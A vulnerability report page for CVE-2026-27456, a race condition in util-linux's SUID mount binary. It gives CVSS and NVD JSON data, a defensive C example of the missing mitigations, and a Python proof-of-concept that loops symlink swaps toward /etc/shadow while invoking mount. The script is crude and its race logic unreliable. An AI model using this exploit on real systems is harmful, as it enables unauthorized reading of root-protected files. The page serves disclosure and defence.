Security Vulnerability Report
CVE-2026-27456 CVSS 4.7 MEDIUM

Published: 2026-04-03 22:16:25
Last Modified: 2026-04-22 16:08:55

Description

util-linux is a random collection of Linux utilities. Prior to version 2.41.4, a TOCTOU (Time-of-Check-Time-of-Use) vulnerability has been identified in the SUID binary /usr/bin/mount from util-linux. The mount binary, when setting up loop devices, validates the source file path with user privileges via fork() + setuid() + realpath(), but subsequently re-canonicalizes and opens it with root privileges (euid=0) without verifying that the path has not been replaced between both operations. Neither O_NOFOLLOW, nor inode comparison, nor post-open fstat() are employed. This allows a local unprivileged user to replace the source file with a symlink pointing to any root-owned file or device during the race window, causing the SUID binary to open and mount it as root. Exploitation requires an /etc/fstab entry with user,loop options whose path points to a directory where the attacker has write permission, and that /usr/bin/mount has the SUID bit set (the default configuration on virtually all Linux distributions). The impact is unauthorized read access to root-protected files and block devices, including backup images, disk volumes, and any file containing a valid filesystem. This issue has been patched in version 2.41.4.
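Added illustration, not util-linux code, of the three mitigations the description names as missing: record the file's (st_dev, st_ino) identity at check time, open with O_NOFOLLOW, and compare fstat() of the opened descriptor against that identity before using it. The function names and the scratch directory under /tmp are assumptions made up for this demo.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

struct file_id { dev_t dev; ino_t ino; };

/* Check phase: record which object the validated path names (symlinks refused). */
int record_identity(const char *path, struct file_id *id) {
    struct stat st;
    if (lstat(path, &st) != 0 || !S_ISREG(st.st_mode)) return -1;
    id->dev = st.st_dev; id->ino = st.st_ino;
    return 0;
}

/* Use phase: O_NOFOLLOW rejects a symlink swapped in at the final component;
 * fstat() on the descriptor proves the object opened is the one recorded. */
int open_verified(const char *path, const struct file_id *id) {
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;                           /* ELOOP if now a symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_dev != id->dev || st.st_ino != id->ino) {
        close(fd); return -1;                        /* swapped since the check */
    }
    return fd;
}

/* Constructed demo (assumed paths): validate a scratch file, then replace it by a
 * symlink and by another regular file. Returns 1 if both swaps are refused. */
int demo_swap_detected(void) {
    char dir[] = "/tmp/toctou_demo.XXXXXX", img[64], other[64];
    struct file_id id;
    if (!mkdtemp(dir)) return 0;
    snprintf(img, sizeof img, "%s/file.img", dir);
    snprintf(other, sizeof other, "%s/other", dir);
    close(open(img, O_WRONLY | O_CREAT, 0600)); close(open(other, O_WRONLY | O_CREAT, 0600));
    int ok = record_identity(img, &id) == 0;
    int fd = open_verified(img, &id);
    ok = ok && fd >= 0; if (fd >= 0) close(fd);      /* untouched file: accepted */
    unlink(img); ok = ok && symlink(other, img) == 0; /* swap 1: symlink */
    ok = ok && open_verified(img, &id) < 0;
    unlink(img); ok = ok && rename(other, img) == 0;  /* swap 2: different inode */
    ok = ok && open_verified(img, &id) < 0;
    unlink(img); rmdir(dir);
    return ok;
}
```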

CVSS Details

CVSS Score: 4.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:kernel:util-linux:*:*:*:*:*:*:*:* - VULNERABLE
util-linux < 2.41.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC Concept: Exploiting TOCTOU in util-linux mount
# Requires: /etc/fstab entry with 'user,loop' pointing to a writable directory
import os
import time
import subprocess

TARGET = '/path/to/writable/directory/file.img'
SYMLINK = '/path/to/writable/directory/link.img'
MOUNT_POINT = '/tmp/mount_point'
PRIVILEGED_FILE = '/etc/shadow'  # Target to read

# Ensure mount point exists
os.makedirs(MOUNT_POINT, exist_ok=True)

# Create a dummy file to pass initial checks
with open(TARGET, 'wb') as f:
    f.write(b'DUMMY')

print(f"[+] Starting race condition attack on {TARGET}...")

try:
    while True:
        # Step 1: Replace file with symlink to privileged file
        if os.path.exists(TARGET):
            os.remove(TARGET)
        os.symlink(PRIVILEGED_FILE, SYMLINK)
        os.rename(SYMLINK, TARGET)

        # Step 2: Trigger mount (SUID binary)
        # In a real exploit, precise timing is critical.
        # This loop attempts to hit the window between check and open.
        proc = subprocess.Popen(['mount', TARGET, MOUNT_POINT],
                                stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

        # Step 3: Quickly switch back (optional, depending on specific check logic)
        # to avoid errors that might stop the process before open.
        # time.sleep(0.001)
        proc.wait()

        # Check if we successfully mounted the target
        if os.path.ismount(MOUNT_POINT):
            print("[!] Exploit potential success! Check mount point.")
            # Clean up
            subprocess.run(['umount', MOUNT_POINT])
            break
except KeyboardInterrupt:
    print("[-] Exploit stopped.")
finally:
    if os.path.islink(TARGET) or os.path.exists(TARGET):
        os.remove(TARGET)

References

https://github.com/util-linux/util-linux/commit/5e390467b26a3cf3fecc04e1a0d482dff3162fc4 (Patch)
https://github.com/util-linux/util-linux/releases/tag/v2.41.4 (Product)
https://github.com/util-linux/util-linux/security/advisories/GHSA-qq4x-vfq4-9h9g (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-27456",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-03T22:16:25.400",
    "lastModified": "2026-04-22T16:08:55.100",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "util-linux is a random collection of Linux utilities. Prior to version 2.41.4, a TOCTOU (Time-of-Check-Time-of-Use) vulnerability has been identified in the SUID binary /usr/bin/mount from util-linux. The mount binary, when setting up loop devices, validates the source file path with user privileges via fork() + setuid() + realpath(), but subsequently re-canonicalizes and opens it with root privileges (euid=0) without verifying that the path has not been replaced between both operations. Neither O_NOFOLLOW, nor inode comparison, nor post-open fstat() are employed. This allows a local unprivileged user to replace the source file with a symlink pointing to any root-owned file or device during the race window, causing the SUID binary to open and mount it as root. Exploitation requires an /etc/fstab entry with user,loop options whose path points to a directory where the attacker has write permission, and that /usr/bin/mount has the SUID bit set (the default configuration on virtually all Linux distributions). The impact is unauthorized read access to root-protected files and block devices, including backup images, disk volumes, and any file containing a valid filesystem. This issue has been patched in version 2.41.4."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.0,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-269"}, {"lang": "en", "value": "CWE-367"}]},
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-367"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kernel:util-linux:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.41.4", "matchCriteriaId": "A0F464C1-2AC1-4B59-B522-89DD9D072C7F"}]}]}
    ],
    "references": [
      {"url": "https://github.com/util-linux/util-linux/commit/5e390467b26a3cf3fecc04e1a0d482dff3162fc4", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/util-linux/util-linux/releases/tag/v2.41.4", "source": "[email protected]", "tags": ["Product"]},
      {"url": "https://github.com/util-linux/util-linux/security/advisories/GHSA-qq4x-vfq4-9h9g", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]},
      {"url": "https://github.com/util-linux/util-linux/security/advisories/GHSA-qq4x-vfq4-9h9g", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}
    ]
  }
}